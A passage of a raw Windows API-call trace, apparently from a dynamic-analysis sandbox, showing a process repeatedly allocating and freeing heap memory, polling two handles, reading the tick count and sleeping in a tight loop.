0x32e64d30 [0188.804] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.804] GetTickCount () returned 0x21253d7 [0188.804] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.804] GetTickCount () returned 0x21253d7 [0188.804] GetTickCount () returned 0x21253d7 [0188.804] GetTickCount () returned 0x21253d7 [0188.804] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.804] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.804] GetTickCount () returned 0x21253d7 [0188.804] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.804] GetTickCount () returned 0x21253d7 [0188.804] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.804] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0188.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.807] GetTickCount () returned 0x2125c7d [0188.807] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.807] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.807] GetTickCount () returned 0x2125c7d [0188.807] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.807] GetTickCount () returned 0x2125c7d [0188.807] GetTickCount () returned 0x2125c7d [0188.807] GetTickCount () returned 0x2125c7d [0188.807] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.807] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.807] GetTickCount () returned 0x2125c7d [0188.807] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.807] GetTickCount () returned 0x2125c7d [0188.807] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.808] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.813] GetTickCount () returned 0x2126513 [0188.813] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.813] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.813] GetTickCount () returned 0x2126513 [0188.813] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.813] GetTickCount () returned 0x2126513 [0188.813] GetTickCount () returned 0x2126513 [0188.813] GetTickCount () returned 0x2126513 [0188.813] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.813] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.813] GetTickCount () returned 0x2126513 [0188.813] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.813] GetTickCount () returned 0x2126513 [0188.813] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.813] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.816] GetTickCount () returned 0x2126da9 [0188.816] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.816] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.816] GetTickCount () returned 0x2126da9 [0188.816] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.816] GetTickCount () returned 0x2126da9 [0188.816] GetTickCount () returned 0x2126da9 [0188.816] GetTickCount () returned 0x2126da9 [0188.816] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.816] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.816] GetTickCount () returned 0x2126da9 [0188.816] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.816] GetTickCount () returned 0x2126da9 [0188.816] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.817] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.820] GetTickCount () returned 0x212764e [0188.820] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0188.820] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.820] GetTickCount () returned 0x212764e [0188.820] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.820] GetTickCount () returned 0x212764e [0188.820] GetTickCount () returned 0x212764e [0188.820] GetTickCount () returned 0x212764e [0188.820] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.820] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.820] GetTickCount () returned 0x212764e [0188.820] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.820] GetTickCount () returned 0x212764e [0188.820] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.820] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0188.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.823] GetTickCount () returned 0x2127ee4 [0188.823] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.823] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.823] GetTickCount () returned 0x2127ee4 [0188.823] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.823] GetTickCount () returned 0x2127ee4 [0188.823] GetTickCount () returned 0x2127ee4 [0188.823] GetTickCount () returned 0x2127ee4 [0188.823] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.823] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.823] GetTickCount () returned 0x2127ee4 [0188.823] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.824] GetTickCount () returned 0x2127ee4 [0188.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0188.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.829] GetTickCount () returned 0x212877a [0188.829] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0188.829] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.829] GetTickCount () returned 0x212877a [0188.829] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.829] GetTickCount () returned 0x212877a [0188.829] GetTickCount () returned 0x212877a [0188.829] GetTickCount () returned 0x212877a [0188.829] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.829] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.829] GetTickCount () returned 0x212877a [0188.829] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.829] GetTickCount () returned 0x212877a [0188.829] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.829] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0188.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.832] GetTickCount () returned 0x2129010 [0188.832] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.832] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.832] GetTickCount () returned 0x2129010 [0188.832] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.832] GetTickCount () returned 0x2129010 [0188.832] GetTickCount () returned 0x2129010 [0188.832] GetTickCount () returned 0x2129010 [0188.832] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.832] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.832] GetTickCount () returned 0x2129010 [0188.832] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.832] GetTickCount () returned 0x2129010 [0188.832] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.833] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0188.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.836] GetTickCount () returned 0x21298b6 [0188.836] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0188.836] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.836] GetTickCount () returned 0x21298b6 [0188.836] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.836] GetTickCount () returned 0x21298b6 [0188.836] GetTickCount () returned 0x21298b6 [0188.836] GetTickCount () returned 0x21298b6 [0188.836] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.836] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.836] GetTickCount () returned 0x21298b6 [0188.836] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.836] GetTickCount () returned 0x21298b6 [0188.836] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.836] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0188.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.839] GetTickCount () returned 0x212a14c [0188.839] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.839] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.839] GetTickCount () returned 0x212a14c [0188.839] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.839] GetTickCount () returned 0x212a14c [0188.839] GetTickCount () returned 0x212a14c [0188.839] GetTickCount () returned 0x212a14c [0188.839] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.839] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.839] GetTickCount () returned 0x212a14c [0188.839] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.839] GetTickCount () returned 0x212a14c [0188.839] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.840] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.845] GetTickCount () returned 0x212a9e2 [0188.845] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0188.845] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.845] GetTickCount () returned 0x212a9e2 [0188.845] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.845] GetTickCount () returned 0x212a9e2 [0188.845] GetTickCount () returned 0x212a9e2 [0188.845] GetTickCount () returned 0x212a9e2 [0188.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.845] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.845] GetTickCount () returned 0x212a9e2 [0188.845] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.845] GetTickCount () returned 0x212a9e2 [0188.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0188.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.849] GetTickCount () returned 0x212b278 [0188.849] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0188.849] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.849] GetTickCount () returned 0x212b278 [0188.849] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.849] GetTickCount () returned 0x212b278 [0188.849] GetTickCount () returned 0x212b278 [0188.849] GetTickCount () returned 0x212b278 [0188.849] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.849] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.849] GetTickCount () returned 0x212b278 [0188.849] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.849] GetTickCount () returned 0x212b278 [0188.849] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.849] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0188.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.853] GetTickCount () returned 0x212bb1d [0188.853] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0188.853] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.853] GetTickCount () returned 0x212bb1d [0188.853] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.853] GetTickCount () returned 0x212bb1d [0188.853] GetTickCount () returned 0x212bb1d [0188.853] GetTickCount () returned 0x212bb1d [0188.853] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.853] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.853] GetTickCount () returned 0x212bb1d [0188.853] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.853] GetTickCount () returned 0x212bb1d [0188.853] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.853] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0188.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.856] GetTickCount () returned 0x212c3b3 [0188.856] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b30 [0188.856] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.856] GetTickCount () returned 0x212c3b3 [0188.856] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.856] GetTickCount () returned 0x212c3b3 [0188.856] GetTickCount () returned 0x212c3b3 [0188.856] GetTickCount () returned 0x212c3b3 [0188.856] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.856] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.856] GetTickCount () returned 0x212c3b3 [0188.856] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.856] GetTickCount () returned 0x212c3b3 [0188.857] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.857] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b30 | out: hHeap=0x2150000) returned 1 [0188.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.861] GetTickCount () returned 0x212cc49 [0188.861] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.861] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.861] GetTickCount () returned 0x212cc49 [0188.861] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.861] GetTickCount () returned 0x212cc49 [0188.861] GetTickCount () returned 0x212cc49 [0188.861] GetTickCount () returned 0x212cc49 [0188.861] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.861] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.861] GetTickCount () returned 0x212cc49 [0188.861] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.862] GetTickCount () returned 0x212cc49 [0188.862] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.862] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.865] GetTickCount () returned 0x212d4df [0188.865] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0188.865] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.865] GetTickCount () returned 0x212d4df [0188.865] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.865] GetTickCount () returned 0x212d4df [0188.865] GetTickCount () returned 0x212d4df [0188.865] GetTickCount () returned 0x212d4df [0188.865] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.865] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.865] GetTickCount () returned 0x212d4df [0188.865] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.865] GetTickCount () returned 0x212d4df [0188.865] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.865] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0188.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.868] GetTickCount () returned 0x212dd85 [0188.868] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.868] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.868] GetTickCount () returned 0x212dd85 [0188.868] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.868] GetTickCount () returned 0x212dd85 [0188.868] GetTickCount () returned 0x212dd85 [0188.868] GetTickCount () returned 0x212dd85 [0188.868] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.868] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.868] GetTickCount () returned 0x212dd85 [0188.868] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.868] GetTickCount () returned 0x212dd85 [0188.868] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.868] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.872] GetTickCount () returned 0x212e61b [0188.872] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0188.872] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.872] GetTickCount () returned 0x212e61b [0188.872] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.872] GetTickCount () returned 0x212e61b [0188.872] GetTickCount () returned 0x212e61b [0188.872] GetTickCount () returned 0x212e61b [0188.872] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.872] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.872] GetTickCount () returned 0x212e61b [0188.872] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.872] GetTickCount () returned 0x212e61b [0188.872] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.873] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0188.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.886] GetTickCount () returned 0x212eec1 [0188.886] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0188.886] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.886] GetTickCount () returned 0x212eec1 [0188.886] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.886] GetTickCount () returned 0x212eec1 [0188.886] GetTickCount () returned 0x212eec1 [0188.886] GetTickCount () returned 0x212eec1 [0188.886] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.886] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.886] GetTickCount () returned 0x212eec1 [0188.886] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.886] GetTickCount () returned 0x212eec1 [0188.886] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.886] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0188.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.889] GetTickCount () returned 0x212f757 [0188.889] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0188.889] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.889] GetTickCount () returned 0x212f757 [0188.889] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.889] GetTickCount () returned 0x212f757 [0188.889] GetTickCount () returned 0x212f757 [0188.889] GetTickCount () returned 0x212f757 [0188.889] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.889] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.889] GetTickCount () returned 0x212f757 [0188.889] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.889] GetTickCount () returned 0x212f757 [0188.890] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.890] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0188.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.893] GetTickCount () returned 0x212ffed [0188.893] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.893] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.893] GetTickCount () returned 0x212ffed [0188.893] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.893] GetTickCount () returned 0x212ffed [0188.893] GetTickCount () returned 0x212ffed [0188.893] GetTickCount () returned 0x212ffed [0188.893] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.893] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.893] GetTickCount () returned 0x212ffed [0188.893] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.893] GetTickCount () returned 0x212ffed [0188.893] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.897] GetTickCount () returned 0x2130883 [0188.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.897] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.897] GetTickCount () returned 0x2130883 [0188.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.897] GetTickCount () 